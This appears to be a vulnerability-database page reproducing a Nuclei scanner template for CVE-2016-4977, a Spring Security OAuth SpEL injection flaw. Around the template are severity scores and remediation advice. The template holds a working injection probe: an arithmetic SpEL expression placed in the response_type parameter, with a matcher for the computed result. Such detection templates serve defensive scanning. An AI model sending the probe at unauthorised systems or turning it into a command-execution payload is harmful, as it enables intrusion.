Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2016-4977
HistoryJan 05, 2022 - 8:37 a.m.

Spring Security OAuth2 Remote Command Execution

2022-01-0508:37:28
ProjectDiscovery
github.com
6

6.5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

8.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

8.8 High

AI Score

Confidence

High

0.046 Low

EPSS

Percentile

92.6%

Spring Security OAuth versions 2.0.0 to 2.0.9 and 1.0.0 to 1.0.5 contain a remote command execution vulnerability. When processing authorization requests using the whitelabel views, the response_type parameter value was executed as Spring SpEL which enabled a malicious user to trigger remote command execution via the crafting of the value for response_type.

id: CVE-2016-4977

info:
  name: Spring Security OAuth2 Remote Command Execution
  author: princechaddha
  severity: high
  description: Spring Security OAuth versions 2.0.0 to 2.0.9 and 1.0.0 to 1.0.5 contain a remote command execution vulnerability. When processing authorization requests using the whitelabel views, the response_type parameter value was executed as Spring SpEL which enabled a malicious user to trigger remote command execution via the crafting of the value for response_type.
  impact: |
    Successful exploitation of this vulnerability can lead to remote code execution, compromising the affected system.
  remediation: Users of 1.0.x should not use whitelabel views for approval and error pages. Users of 2.0.x should either not use whitelabel views for approval and error pages or upgrade to 2.0.10 or later.
  reference:
    - https://github.com/vulhub/vulhub/blob/master/spring/CVE-2016-4977/README.md
    - https://tanzu.vmware.com/security/cve-2016-4977
    - https://nvd.nist.gov/vuln/detail/CVE-2016-4977
    - https://pivotal.io/security/cve-2016-4977
    - http://www.openwall.com/lists/oss-security/2019/10/16/1
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2016-4977
    cwe-id: CWE-19
    epss-score: 0.04558
    epss-percentile: 0.92501
    cpe: cpe:2.3:a:pivotal:spring_security_oauth:1.0.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: pivotal
    product: spring_security_oauth
  tags: cve2016,cve,oauth2,oauth,rce,ssti,vulhub,spring,pivotal

http:
  - method: GET
    path:
      - "{{BaseURL}}/oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Unsupported response types: [978015547]"

      - type: status
        status:
          - 400
# digest: 4a0a00473045022100c66dd438fc32b601bda760d115a1aa6c0ac04c6d508e25af37bed49c7dccb6bb0220745ce2c6eb5aa672f5d9903bf30440d9a7a166a1bc7b45ca0aed623a32b0d181:922c64590222798bb761d5b6d8e72950

6.5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:S/C:P/I:P/A:P

8.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

8.8 High

AI Score

Confidence

High

0.046 Low

EPSS

Percentile

92.6%